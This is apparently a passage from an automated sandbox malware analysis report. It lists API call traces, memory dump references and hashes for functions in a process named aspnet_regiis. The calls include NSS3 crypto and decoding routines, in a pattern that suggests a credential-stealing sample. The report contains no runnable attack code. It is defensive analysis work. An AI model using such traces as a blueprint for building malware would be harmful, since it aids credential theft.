                                                                                                                                                                                • Part of subcall function 02A07FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,02A0E756,?,?,?), ref: 02A07FF5
                                                                                                                                                                                • Part of subcall function 02A07FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,02A0E756,?,?,?), ref: 02A0800C
                                                                                                                                                                                • Part of subcall function 02A07FAC: CloseHandle.KERNEL32(?,?,?,?,?,02A0E756,?,?,?), ref: 02A08034
                                                                                                                                                                                • Part of subcall function 02A121E7: GlobalAlloc.KERNEL32(00000000,?,?,?,?,?,02A1595C,?), ref: 02A121F2
                                                                                                                                                                              • StrStrA.SHLWAPI(00000000), ref: 02A1596A
                                                                                                                                                                              • GlobalFree.KERNEL32(?), ref: 02A15A8C
                                                                                                                                                                                • Part of subcall function 02A08048: CryptStringToBinaryA.CRYPT32(02A06724,00000000,00000001,00000000,?,00000000,00000000), ref: 02A08060
                                                                                                                                                                                • Part of subcall function 02A08048: LocalAlloc.KERNEL32(00000040,?,?,?,02A06724,?), ref: 02A0806E
                                                                                                                                                                                • Part of subcall function 02A08048: CryptStringToBinaryA.CRYPT32(02A06724,00000000,00000001,00000000,?,00000000,00000000), ref: 02A08084
                                                                                                                                                                                • Part of subcall function 02A08048: LocalFree.KERNEL32(?,?,?,02A06724,?), ref: 02A08093
                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 02A15A18
                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,02A36645), ref: 02A15A35
                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 02A15A54
                                                                                                                                                                              • lstrcat.KERNEL32(?,02A36A8C), ref: 02A15A65
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: lstrcat$File$AllocLocal$BinaryCryptFreeGlobalString_memset$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 4109952398-0
                                                                                                                                                                              • Opcode ID: 8142f5a8ec99bdeeda9cc8c05618d146da78e1230c6af6f37f146ddfb5acd682
                                                                                                                                                                              • Instruction ID: af958a4be61c6c2ee4c6f59a4bdaa1910ff539c86cd37143c38edb7fb7eae246
                                                                                                                                                                              • Opcode Fuzzy Hash: 8142f5a8ec99bdeeda9cc8c05618d146da78e1230c6af6f37f146ddfb5acd682
                                                                                                                                                                              • Instruction Fuzzy Hash: DA7110B1C8022D9FDF20DF64DD84BD977BAAB88310F0405E5E909A3150EF329BA98F55
                                                                                                                                                                              Function 6CB04C70 Relevance: 18.1, APIs: 12, Instructions: 116threadCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • TlsGetValue.KERNEL32(?,?,?,6CB03921,6CCE14E4,6CC4CC70), ref: 6CB04C97
                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,?,?,6CB03921,6CCE14E4,6CC4CC70), ref: 6CB04CB0
                                                                                                                                                                              • PR_Unlock.NSS3(?,?,?,?,?,6CB03921,6CCE14E4,6CC4CC70), ref: 6CB04CC9
                                                                                                                                                                              • TlsGetValue.KERNEL32(?,?,?,?,?,6CB03921,6CCE14E4,6CC4CC70), ref: 6CB04D11
                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,6CB03921,6CCE14E4,6CC4CC70), ref: 6CB04D2A
                                                                                                                                                                              • PR_NotifyAllCondVar.NSS3(?,?,?,?,?,?,?,6CB03921,6CCE14E4,6CC4CC70), ref: 6CB04D4A
                                                                                                                                                                              • PR_Unlock.NSS3(?,?,?,?,?,?,?,6CB03921,6CCE14E4,6CC4CC70), ref: 6CB04D57
                                                                                                                                                                              • PR_GetCurrentThread.NSS3(?,?,?,?,?,6CB03921,6CCE14E4,6CC4CC70), ref: 6CB04D97
                                                                                                                                                                              • PR_Lock.NSS3(?,?,?,?,?,6CB03921,6CCE14E4,6CC4CC70), ref: 6CB04DBA
                                                                                                                                                                              • PR_WaitCondVar.NSS3 ref: 6CB04DD4
                                                                                                                                                                              • PR_Unlock.NSS3(?,?,?,?,?,6CB03921,6CCE14E4,6CC4CC70), ref: 6CB04DE6
                                                                                                                                                                              • PR_GetCurrentThread.NSS3(?,?,?,?,?,6CB03921,6CCE14E4,6CC4CC70), ref: 6CB04DEF
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2680557008.000000006CB01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CB00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2680509045.000000006CB00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680720904.000000006CC9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680807353.000000006CCDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680870106.000000006CCDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680890543.000000006CCE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680908405.000000006CCE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_6cb00000_aspnet_regiis.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Unlock$CondCriticalCurrentEnterSectionThreadValue$LockNotifyWait
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3388019835-0
                                                                                                                                                                              • Opcode ID: 110f73de5c1782ec1f6e161feaee4a67a536dbddf7820e2fd31a377a67753cd0
                                                                                                                                                                              • Instruction ID: a14fc52fdb4f1570716f8bb0716d2c98c5b4af2dbdc441214df9ba4e89079cea
                                                                                                                                                                              • Opcode Fuzzy Hash: 110f73de5c1782ec1f6e161feaee4a67a536dbddf7820e2fd31a377a67753cd0
                                                                                                                                                                              • Instruction Fuzzy Hash: 1A417BB1A14A95CFCB10AF7CD484159BBB8FF1A314F058669D888DB711EB30E894CF92
                                                                                                                                                                              Function 02A28B14 Relevance: 18.1, APIs: 12, Instructions: 95COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: _free$__calloc_crt$Sleep__copytlocinfo_nolock__setlocale_nolock__setmbcp_nolock
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3833677464-0
                                                                                                                                                                              • Opcode ID: 22bf12a178615cb1d87898be99bfd6efa9ffc9b6b2ba0e7347fbc566c69f9df1
                                                                                                                                                                              • Instruction ID: 5ca5ad045d03e98263f05c5801ea28c24ce2ee38439fa75f9327860c01a1ce28
                                                                                                                                                                              • Opcode Fuzzy Hash: 22bf12a178615cb1d87898be99bfd6efa9ffc9b6b2ba0e7347fbc566c69f9df1
                                                                                                                                                                              • Instruction Fuzzy Hash: A3212771185A21FFDB317F2DD941D1EB7E6DF42B60B10802DF58446664DF358848CE64
                                                                                                                                                                              Function 02A015E6 Relevance: 18.0, APIs: 12, Instructions: 50windowmemoryregistryCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 02A015BC: GetProcessHeap.KERNEL32(00000008,000000FF), ref: 02A015C6
                                                                                                                                                                                • Part of subcall function 02A015BC: RtlAllocateHeap.NTDLL(00000000), ref: 02A015CD
                                                                                                                                                                              • MessageBoxA.USER32(00000000,00000000,00000000,00000000), ref: 02A01606
                                                                                                                                                                              • GetLastError.KERNEL32 ref: 02A0160C
                                                                                                                                                                              • RtlSetCriticalSectionSpinCount.NTDLL(00000000,00000000), ref: 02A01614
                                                                                                                                                                              • GetWindowContextHelpId.USER32(00000000), ref: 02A0161B
                                                                                                                                                                              • GetWindowLongW.USER32(00000000,00000000), ref: 02A01623
                                                                                                                                                                              • RegisterClassW.USER32(00000000), ref: 02A0162A
                                                                                                                                                                              • IsWindowVisible.USER32(00000000), ref: 02A01631
                                                                                                                                                                              • ConvertDefaultLocale.KERNEL32(00000000), ref: 02A01638
                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 02A01644
                                                                                                                                                                              • IsDialogMessageW.USER32(00000000,00000000), ref: 02A0164C
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 02A01656
                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02A0165D
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Heap$Window$MessageProcess$AllocateByteCharClassContextConvertCountCriticalDefaultDialogErrorFreeHelpLastLocaleLongMultiRegisterSectionSpinVisibleWide
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3736313755-0
                                                                                                                                                                              • Opcode ID: d5335a05308f5e5b2cedd71d9bbd4cb361a2ab2ffa5f7b1f7c6f979d10f3655c
                                                                                                                                                                              • Instruction ID: ea03cfe2669c67e23f8e26023395ac476dfb075d53915be8cb9b5daeef8ca0f9
                                                                                                                                                                              • Opcode Fuzzy Hash: d5335a05308f5e5b2cedd71d9bbd4cb361a2ab2ffa5f7b1f7c6f979d10f3655c
                                                                                                                                                                              • Instruction Fuzzy Hash: 13014672882824BBC7156BE1AD4CDDF7E6CFE0B352B040845F60A910408F798622CBFA
                                                                                                                                                                              Function 6CBCECE0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 78COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,00000000,?,?,6CBCDE64), ref: 6CBCED0C
                                                                                                                                                                              • SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CBCED22
                                                                                                                                                                                • Part of subcall function 6CBDB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CCB18D0,?), ref: 6CBDB095
                                                                                                                                                                              • PL_FreeArenaPool.NSS3(?), ref: 6CBCED4A
                                                                                                                                                                              • PL_FinishArenaPool.NSS3(?), ref: 6CBCED6B
                                                                                                                                                                              • PR_CallOnce.NSS3(6CCE2AA4,6CBE12D0), ref: 6CBCED38
                                                                                                                                                                                • Part of subcall function 6CB04C70: TlsGetValue.KERNEL32(?,?,?,6CB03921,6CCE14E4,6CC4CC70), ref: 6CB04C97
                                                                                                                                                                                • Part of subcall function 6CB04C70: EnterCriticalSection.KERNEL32(?,?,?,?,6CB03921,6CCE14E4,6CC4CC70), ref: 6CB04CB0
                                                                                                                                                                                • Part of subcall function 6CB04C70: PR_Unlock.NSS3(?,?,?,?,?,6CB03921,6CCE14E4,6CC4CC70), ref: 6CB04CC9
                                                                                                                                                                              • SECOID_FindOID_Util.NSS3(?), ref: 6CBCED52
                                                                                                                                                                              • PR_CallOnce.NSS3(6CCE2AA4,6CBE12D0), ref: 6CBCED83
                                                                                                                                                                              • PL_FreeArenaPool.NSS3(?), ref: 6CBCED95
                                                                                                                                                                              • PL_FinishArenaPool.NSS3(?), ref: 6CBCED9D
                                                                                                                                                                                • Part of subcall function 6CBE64F0: free.MOZGLUE(00000000,00000000,00000000,00000000,?,6CBE127C,00000000,00000000,00000000), ref: 6CBE650E
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2680557008.000000006CB01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CB00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2680509045.000000006CB00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680720904.000000006CC9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680807353.000000006CCDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680870106.000000006CCDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680890543.000000006CCE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680908405.000000006CCE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_6cb00000_aspnet_regiis.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ArenaPool$CallFinishFreeOnceUtil$CriticalDecodeEnterErrorFindInitItem_QuickSectionUnlockValuefree
                                                                                                                                                                              • String ID: security
                                                                                                                                                                              • API String ID: 3323615905-3315324353
                                                                                                                                                                              • Opcode ID: 73bbc61578522cb584bc47ec566ef742d852df05538fa8e008ab3537a8f29814
                                                                                                                                                                              • Instruction ID: 85ba84b4467c0b6ebe8deed775ee4a79e47926d0e7f52ee9afd1d8590ad50d5c
                                                                                                                                                                              • Opcode Fuzzy Hash: 73bbc61578522cb584bc47ec566ef742d852df05538fa8e008ab3537a8f29814
                                                                                                                                                                              • Instruction Fuzzy Hash: 73118C76B002E8A7E6205725AC42BBF7378AF06B4CF050828E81173E41FB20A50CD6E7
                                                                                                                                                                              Function 6CBB2CD0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 73COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • PR_LogPrint.NSS3(C_InitToken), ref: 6CBB2CEC
                                                                                                                                                                              • PR_LogPrint.NSS3( slotID = 0x%x,?), ref: 6CBB2D07
                                                                                                                                                                                • Part of subcall function 6CC909D0: PR_Now.NSS3 ref: 6CC90A22
                                                                                                                                                                                • Part of subcall function 6CC909D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6CC90A35
                                                                                                                                                                                • Part of subcall function 6CC909D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6CC90A66
                                                                                                                                                                                • Part of subcall function 6CC909D0: PR_GetCurrentThread.NSS3 ref: 6CC90A70
                                                                                                                                                                                • Part of subcall function 6CC909D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6CC90A9D
                                                                                                                                                                                • Part of subcall function 6CC909D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6CC90AC8
                                                                                                                                                                                • Part of subcall function 6CC909D0: PR_vsmprintf.NSS3(?,?), ref: 6CC90AE8
                                                                                                                                                                                • Part of subcall function 6CC909D0: EnterCriticalSection.KERNEL32(?), ref: 6CC90B19
                                                                                                                                                                                • Part of subcall function 6CC909D0: OutputDebugStringA.KERNEL32(00000000), ref: 6CC90B48
                                                                                                                                                                                • Part of subcall function 6CC909D0: _PR_MD_UNLOCK.NSS3(?), ref: 6CC90C76
                                                                                                                                                                                • Part of subcall function 6CC909D0: PR_LogFlush.NSS3 ref: 6CC90C7E
                                                                                                                                                                              • PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6CBB2D22
                                                                                                                                                                                • Part of subcall function 6CC909D0: OutputDebugStringA.KERNEL32(?), ref: 6CC90B88
                                                                                                                                                                                • Part of subcall function 6CC909D0: memcpy.VCRUNTIME140(?,?,00000000), ref: 6CC90C5D
                                                                                                                                                                                • Part of subcall function 6CC909D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 6CC90C8D
                                                                                                                                                                                • Part of subcall function 6CC909D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CC90C9C
                                                                                                                                                                                • Part of subcall function 6CC909D0: OutputDebugStringA.KERNEL32(?), ref: 6CC90CD1
                                                                                                                                                                                • Part of subcall function 6CC909D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6CC90CEC
                                                                                                                                                                                • Part of subcall function 6CC909D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CC90CFB
                                                                                                                                                                                • Part of subcall function 6CC909D0: OutputDebugStringA.KERNEL32(00000000), ref: 6CC90D16
                                                                                                                                                                                • Part of subcall function 6CC909D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,?), ref: 6CC90D26
                                                                                                                                                                                • Part of subcall function 6CC909D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CC90D35
                                                                                                                                                                                • Part of subcall function 6CC909D0: OutputDebugStringA.KERNEL32(0000000A), ref: 6CC90D65
                                                                                                                                                                                • Part of subcall function 6CC909D0: fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,?), ref: 6CC90D70
                                                                                                                                                                                • Part of subcall function 6CC909D0: _PR_MD_UNLOCK.NSS3(?), ref: 6CC90D90
                                                                                                                                                                                • Part of subcall function 6CC909D0: free.MOZGLUE(00000000), ref: 6CC90D99
                                                                                                                                                                              • PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6CBB2D3B
                                                                                                                                                                                • Part of subcall function 6CC909D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6CC90BAB
                                                                                                                                                                                • Part of subcall function 6CC909D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CC90BBA
                                                                                                                                                                                • Part of subcall function 6CC909D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CC90D7E
                                                                                                                                                                              • PR_LogPrint.NSS3( pLabel = 0x%p,?), ref: 6CBB2D54
                                                                                                                                                                                • Part of subcall function 6CC909D0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CC90BCB
                                                                                                                                                                                • Part of subcall function 6CC909D0: EnterCriticalSection.KERNEL32(?), ref: 6CC90BDE
                                                                                                                                                                                • Part of subcall function 6CC909D0: OutputDebugStringA.KERNEL32(?), ref: 6CC90C16
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2680557008.000000006CB01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CB00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2680509045.000000006CB00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680720904.000000006CC9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680807353.000000006CCDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680870106.000000006CCDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680890543.000000006CCE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680908405.000000006CCE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_6cb00000_aspnet_regiis.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: DebugOutputString$Printfflush$fwrite$CriticalEnterR_snprintfSection$CurrentExplodeFlushR_vsmprintfR_vsnprintfThreadTimefputcfreememcpystrlen
                                                                                                                                                                              • String ID: pLabel = 0x%p$ pPin = 0x%p$ slotID = 0x%x$ ulPinLen = %d$C_InitToken
                                                                                                                                                                              • API String ID: 420000887-1567254798
                                                                                                                                                                              • Opcode ID: 5a0715ec0d1c49827ef353fb1e82f3f18c51a4f05e1d8dc786205034433630c4
                                                                                                                                                                              • Instruction ID: 13b5259d0492abf0c1270ea11254b277263e11edea18ccff4f474c82141bb7f1
                                                                                                                                                                              • Opcode Fuzzy Hash: 5a0715ec0d1c49827ef353fb1e82f3f18c51a4f05e1d8dc786205034433630c4
                                                                                                                                                                              • Instruction Fuzzy Hash: 4521CF75200195AFDB409B94DD9CBA93BB1EB4B31AF448125F508A7622EF308D49CBA2
                                                                                                                                                                              Function 6CC90EB0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 65COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • PR_LogPrint.NSS3(Aborting,?,6CB72357), ref: 6CC90EB8
                                                                                                                                                                              • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(6CB72357), ref: 6CC90EC0
                                                                                                                                                                              • PR_LogPrint.NSS3(Assertion failure: %s, at %s:%d,00000000,00000001,?,00000001,00000000,00000000), ref: 6CC90EE6
                                                                                                                                                                                • Part of subcall function 6CC909D0: PR_Now.NSS3 ref: 6CC90A22
                                                                                                                                                                                • Part of subcall function 6CC909D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6CC90A35
                                                                                                                                                                                • Part of subcall function 6CC909D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6CC90A66
                                                                                                                                                                                • Part of subcall function 6CC909D0: PR_GetCurrentThread.NSS3 ref: 6CC90A70
                                                                                                                                                                                • Part of subcall function 6CC909D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6CC90A9D
                                                                                                                                                                                • Part of subcall function 6CC909D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6CC90AC8
                                                                                                                                                                                • Part of subcall function 6CC909D0: PR_vsmprintf.NSS3(?,?), ref: 6CC90AE8
                                                                                                                                                                                • Part of subcall function 6CC909D0: EnterCriticalSection.KERNEL32(?), ref: 6CC90B19
                                                                                                                                                                                • Part of subcall function 6CC909D0: OutputDebugStringA.KERNEL32(00000000), ref: 6CC90B48
                                                                                                                                                                                • Part of subcall function 6CC909D0: _PR_MD_UNLOCK.NSS3(?), ref: 6CC90C76
                                                                                                                                                                                • Part of subcall function 6CC909D0: PR_LogFlush.NSS3 ref: 6CC90C7E
                                                                                                                                                                              • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00000001,00000000,00000000), ref: 6CC90EFA
                                                                                                                                                                                • Part of subcall function 6CB7AEE0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000001,?,00000000,?,00000001,?,?,?,00000001,00000000,00000000), ref: 6CB7AF0E
                                                                                                                                                                              • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CC90F16
                                                                                                                                                                              • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CC90F1C
                                                                                                                                                                              • DebugBreak.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CC90F25
                                                                                                                                                                              • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CC90F2B
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2680557008.000000006CB01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CB00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2680509045.000000006CB00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680720904.000000006CC9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680807353.000000006CCDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680870106.000000006CCDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680890543.000000006CCE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
